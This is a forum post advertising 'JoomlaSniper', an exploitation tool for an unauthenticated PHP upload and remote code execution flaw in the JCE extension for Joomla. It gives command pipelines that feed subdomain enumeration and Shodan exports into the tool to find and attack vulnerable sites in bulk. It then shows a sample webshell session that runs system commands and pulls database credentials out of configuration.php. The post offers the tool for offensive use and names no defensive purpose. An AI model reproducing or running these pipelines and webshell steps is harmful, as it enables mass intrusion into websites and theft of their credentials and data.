cra1g Posted 6 hours ago Report Posted 6 hours ago JoomlaSniper is a comprehensive exploitation framework for CVE-2026-48907, an unauthenticated Remote Code Execution vulnerability in the JCE (Joomla Content Editor) extension for Joomla CMS. The vulnerability allows attackers to upload arbitrary PHP files via the unauthenticated profiles.import endpoint, without any authentication. Depending on server configuration, this results in full remote code execution. # Full recon pipeline — find Joomla sites with JCE subfinder -d target.com -silent | \ httpx -silent -match-string "com_jce" | \ python3 JoomlaSniper.py -t 10 -o results.json # Shodan export → httpx filter → JoomlaSniper cat shodan_results.txt | \ httpx -silent -path /plugins/editors/jce/jce.xml -status-code -match-code 200 | \ awk '{print $1}' | \ python3 JoomlaSniper.py -t 20 --silent -o rce_results.json JOOMLASNIPR — INTERACTIVE SHELL Target : https://target.com Shell : https://target.com/tmp/jce4x2k9a.xml.php Vector : V1:tmp ════════════════════════════════════════════════════ jce@target.com$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) jce@target.com$ sysinfo OS: Linux server 5.4.0-208-generic #228-Ubuntu User: uid=33(www-data) CWD: /var/www/html PHP: PHP 8.1.27 jce@target.com$ loot /var/www/html/configuration.php $user = 'joomla_db_user'; $password = 'S3cur3P@ssw0rd!'; $db = 'joomla_production'; $host = 'localhost'; jce@target.com$ funcs shell_exec: OK exec: OK system: OK passthru: OK jce@target.com$ exit Shell session ended. Quote